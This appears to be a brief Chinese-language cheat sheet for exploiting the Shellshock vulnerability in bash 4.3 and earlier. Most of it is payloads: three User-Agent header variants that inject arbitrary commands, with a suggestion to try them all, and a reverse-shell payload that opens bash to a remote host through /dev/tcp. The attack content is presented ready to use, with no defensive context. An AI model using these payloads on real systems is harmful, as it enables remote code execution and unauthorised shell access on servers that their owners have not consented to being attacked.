跳转至

shellshock

bash<=4.3

一、任意命令执行

User-Agent: () { :;}; echo ;/bin/ls -al /

或者() { :;}; /bin/ls -al /

或者x:() { :;}; /bin/ls -al /

都试下

img

二、反弹shell

User-Agent: () { :;}; echo; /bin/bash -l >& /dev/tcp/192.168.22.1/12345 0>&1

img